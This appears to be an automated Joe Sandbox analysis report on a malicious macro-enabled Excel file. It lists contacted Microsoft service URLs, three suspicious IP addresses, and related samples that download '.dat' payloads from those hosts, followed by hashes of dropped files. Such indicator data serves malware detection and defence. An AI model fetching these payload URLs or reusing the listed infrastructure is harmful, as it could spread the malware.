                                                              https://outlook.office365.com/autodiscover/autodiscover.json98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                high
                                                                https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                  high
                                                                  https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                    high
                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                      high
                                                                      https://ncus.contentsync.98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                        high
                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                          high
                                                                          http://weather.service.msn.com/data.aspx98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                            high
                                                                            https://apis.live.net/v5.0/98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                              high
                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                high
                                                                                https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                  high
                                                                                  https://management.azure.com98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                    high
                                                                                    https://wus2.contentsync.98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://incidents.diagnostics.office.com98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                      high
                                                                                      https://clients.config.office.net/user/v1.0/ios98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                        high
                                                                                        https://insertmedia.bing.office.net/odc/insertmedia98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                          high
                                                                                          https://o365auditrealtimeingestion.manage.office.com98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                            high
                                                                                            https://outlook.office365.com/api/v1.0/me/Activities98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                              high
                                                                                              https://api.office.net98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                high
                                                                                                https://incidents.diagnosticssdf.office.com98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                  high
                                                                                                  https://asgsmsproxyapi.azurewebsites.net/98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                  • 0%, Virustotal, Browse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://clients.config.office.net/user/v1.0/android/policies98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                    high
                                                                                                    https://entitlement.diagnostics.office.com98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                      high
                                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                        high
                                                                                                        https://substrate.office.com/search/api/v2/init98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/log98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorize98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.com98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v298DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/mac98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.ai98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.com98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devices98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorize98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                                                                                                                  high

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  190.14.37.3
                                                                                                                                                  unknownPanama
                                                                                                                                                  52469OffshoreRacksSAPAfalse
                                                                                                                                                  185.183.99.120
                                                                                                                                                  unknownNetherlands
                                                                                                                                                  60117HSAEfalse
                                                                                                                                                  185.240.103.219
                                                                                                                                                  unknownRussian Federation
                                                                                                                                                  57724DDOS-GUARDRUfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                  Analysis ID:440654
                                                                                                                                                  Start date:25.06.2021
                                                                                                                                                  Start time:18:49:41
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 5m 17s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:Permission-40776837-06252021.xlsm
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:34
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal64.expl.evad.winXLSM@7/8@0/3
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsm
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 13.64.90.137, 23.211.6.115, 52.147.198.201, 52.109.76.68, 52.109.88.37, 52.109.12.21, 20.82.209.183, 23.211.4.86, 40.112.88.60, 20.54.104.15, 173.222.108.210, 173.222.108.226, 80.67.82.211, 80.67.82.235, 20.82.210.154
                                                                                                                                                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  No simulations

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  190.14.37.3Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.3/44372.7746763889.dat
                                                                                                                                                  Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.3/44372.7722377315.dat
                                                                                                                                                  Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.3/44372.7698814815.dat
                                                                                                                                                  Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.3/44372.7671056713.dat
                                                                                                                                                  Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.3/44372.593127662.dat
                                                                                                                                                  Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.3/44372.5879460648.dat
                                                                                                                                                  185.183.99.120Permission-40776837-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.183.99.120/44372.7795725694.dat
                                                                                                                                                  Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.183.99.120/44372.7746763889.dat
                                                                                                                                                  Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.183.99.120/44372.7722377315.dat
                                                                                                                                                  Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.183.99.120/44372.7698814815.dat
                                                                                                                                                  Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.183.99.120/44372.7671056713.dat
                                                                                                                                                  Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.183.99.120/44372.593127662.dat
                                                                                                                                                  Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.183.99.120/44372.5879460648.dat
                                                                                                                                                  185.240.103.219Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.240.103.219/44372.593127662.dat
                                                                                                                                                  Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.240.103.219/44372.5879460648.dat

                                                                                                                                                  Domains

                                                                                                                                                  No context

                                                                                                                                                  ASN

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  DDOS-GUARDRUPermission-40776837-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.240.103.219
                                                                                                                                                  Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.240.103.219
                                                                                                                                                  Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.240.103.219
                                                                                                                                                  Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.240.103.219
                                                                                                                                                  Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.240.103.219
                                                                                                                                                  Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.240.103.219
                                                                                                                                                  Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.240.103.219
                                                                                                                                                  Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 5.253.62.174
                                                                                                                                                  Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 5.253.62.174
                                                                                                                                                  ForceNitro.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.178.208.135
                                                                                                                                                  PO#8076.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.129.100.112
                                                                                                                                                  Cancellation_Letter_2137859823_06112021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.240.103.162
                                                                                                                                                  Cancellation_Letter_2137859823_06112021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.240.103.162
                                                                                                                                                  jebDtHCePK9feGL.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.129.100.112
                                                                                                                                                  EDS03932,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.178.208.160
                                                                                                                                                  PO_29_00412.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.178.208.160
                                                                                                                                                  PO_29_00412.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.178.208.160
                                                                                                                                                  12042021493876783,xlsx.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.178.208.160
                                                                                                                                                  Ref. PDF IGAPO17493.exeGet hashmaliciousBrowse
                                                                                                                                                  • 5.253.61.31
                                                                                                                                                  AxR7BY4wzz.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.178.208.189
                                                                                                                                                  OffshoreRacksSAPAPermission-40776837-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.3
                                                                                                                                                  Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.3
                                                                                                                                                  Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.3
                                                                                                                                                  Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.3
                                                                                                                                                  Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.3
                                                                                                                                                  Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.3
                                                                                                                                                  Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.3
                                                                                                                                                  4cDyOofgzT.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.2
                                                                                                                                                  4cDyOofgzT.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.2
                                                                                                                                                  341288734918_06172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.2
                                                                                                                                                  341288734918_06172021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.2
                                                                                                                                                  Rebate_247668103_06142021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.135
                                                                                                                                                  Rebate_247668103_06142021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.135
                                                                                                                                                  Rebate_1963763550_06142021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.135
                                                                                                                                                  Rebate_1963763550_06142021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.135
                                                                                                                                                  Rebate_234359500_06142021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.135
                                                                                                                                                  Rebate_234359500_06142021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.135
                                                                                                                                                  banUwVSwBY.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.134
                                                                                                                                                  banUwVSwBY.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.134
                                                                                                                                                  Rebate_18082425_05272021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 190.14.37.102
                                                                                                                                                  HSAEPermission-40776837-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.183.99.120
                                                                                                                                                  Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.183.99.120
                                                                                                                                                  Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.183.99.120
                                                                                                                                                  Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.183.99.120
                                                                                                                                                  Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.183.99.120
                                                                                                                                                  Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.183.99.120
                                                                                                                                                  Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.183.99.120
                                                                                                                                                  Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.117.73.74
                                                                                                                                                  Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
                                                                                                                                                  • 185.117.73.74
                                                                                                                                                  xa6FEoUw0W.dllGet hashmaliciousBrowse
                                                                                                                                                  • 188.116.36.211
                                                                                                                                                  tszs3mwUbe.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.45.193.29
                                                                                                                                                  pZ50mMKSLi.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.45.193.29
                                                                                                                                                  qTnwCotzR9.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.45.193.29
                                                                                                                                                  PwBsqWQ7jJ.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.45.193.29
                                                                                                                                                  aGDehjYIws.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.198.57.204
                                                                                                                                                  Tjhsm8p85Y.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.45.193.29
                                                                                                                                                  T23HJFoN2Y.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.45.193.29
                                                                                                                                                  i7NsO9mhTD.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.45.193.29
                                                                                                                                                  o7w2HSi17V.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.27.225
                                                                                                                                                  AB1CEF822F66D7B77574A21C8154D4A6E9FCD196A6659.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.198.57.204

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):135189
                                                                                                                                                  Entropy (8bit):5.363294803170752
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:zcQIKNgeBTA3gBwlpQ9DQW+z7Y34ZliKWXboOidX5E6LWME9:vEQ9DQW+zvXO1
                                                                                                                                                  MD5:0F6EAACABE50A5A4848AD36539FAE0FD
                                                                                                                                                  SHA1:37FCD9388B46C75A49114BE5A7F363BC5E9E303D
                                                                                                                                                  SHA-256:F9E28234FDB4082DD0AF71957D4262F70EE1F59290E8224516EC4F8EC0B030C8
                                                                                                                                                  SHA-512:84BC292208FBDBB8A3016A46E0FE637963A1E9426EB7BBCADE6DCD35C3A6F4BB2A817F3367E3FED2455A9D9F32C0F274C987F9A5411EDBBF308B19F7ADD228F8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-25T16:50:32">.. Build: 16.0.14223.30528-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7B377E74.jpg
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:[TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2021:02:11 21:11:18], baseline, precision 8, 1860x1000, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):139381
                                                                                                                                                  Entropy (8bit):7.677272725029824
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:CmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOy:54P4346PgZw9gQat
                                                                                                                                                  MD5:53918FB868F1540920FC189C6783FC7C
                                                                                                                                                  SHA1:135CB103C5B5125C80285A83AE728B559313BADC
                                                                                                                                                  SHA-256:7F6AD5212338A6586251AEF92D2543AA8E70C815FE0BF7ADDCE2C0A83D20A0B3
                                                                                                                                                  SHA-512:31391EFC3D377EA32A537EF3DDCA41ABAF34C4C83CDFEF9A64D40DE219B88A293BE2BF01D6A5D2B23365513CB880020F37CA8E90506C41FB7FC8E42D4D641F51
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: ....!jExif..MM.*.............................b...........j.(...........1.........r.2...........i...............-....'..-....'.Adobe Photoshop CS6 (Windows).2021:02:11 21:11:18..........................D.......................................................&.(................................ 4.......H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch....
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\16810000
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):153181
                                                                                                                                                  Entropy (8bit):7.664774686846978
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:ZmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOg:o4P4346PgZw9gQaT
                                                                                                                                                  MD5:D925A29A54F9F029EB0EE51F80548286
                                                                                                                                                  SHA1:0A397032E717FE62775DED92D8EA84E6A8799E9F
                                                                                                                                                  SHA-256:27BA6F8732F38FE8EB463F9B97F838E5E816250A352BAD986B5C9423BB928D4E
                                                                                                                                                  SHA-512:BCD606F2AD59B63396CB75870D2167E6F895357360FD64DABD2051AFC868C3CCF359490F696BB639A0980A1D9481004ABB0A7193BE96042442C20021EF4074D0
